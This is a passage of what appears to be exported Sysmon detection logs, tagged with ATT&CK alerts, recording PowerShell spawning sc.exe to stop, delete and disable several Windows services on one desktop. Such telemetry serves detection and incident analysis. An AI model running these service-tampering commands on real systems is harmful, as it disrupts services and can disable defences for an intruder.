WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.322884800Z"",""eventRecordID"":""2879"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.320\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d4d22500}\r\nProcessId: 7372\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.320"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010d4d22500}"",""processId"":""7372"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.452",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.283 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010ddcf2500} +ProcessId: 6420 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.286602900Z"",""eventRecordID"":""2877"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.283\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010ddcf2500}\r\nProcessId: 6420\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.283"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010ddcf2500}"",""processId"":""6420"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.403",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.270 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010cccd2500} +ProcessId: 7512 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.272798200Z"",""eventRecordID"":""2876"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.270\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010cccd2500}\r\nProcessId: 7512\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.270"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010cccd2500}"",""processId"":""7512"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.354",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.228 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010b0c92500} +ProcessId: 6336 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.233191400Z"",""eventRecordID"":""2873"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.228\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010b0c92500}\r\nProcessId: 6336\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.228"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010b0c92500}"",""processId"":""6336"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.308",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.171 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010bbc22500} +ProcessId: 8168 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.175005100Z"",""eventRecordID"":""2870"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.171\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010bbc22500}\r\nProcessId: 8168\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.171"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010bbc22500}"",""processId"":""8168"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.291",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.148 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-00108dc12500} +ProcessId: 4216 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config CLR Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config CLR Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.154180600Z"",""eventRecordID"":""2869"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.148\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-00108dc12500}\r\nProcessId: 4216\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config CLR Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.148"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-00108dc12500}"",""processId"":""4216"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config CLR Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.259",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.099 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-00106abe2500} +ProcessId: 7356 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.107919100Z"",""eventRecordID"":""2867"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.099\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-00106abe2500}\r\nProcessId: 7356\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 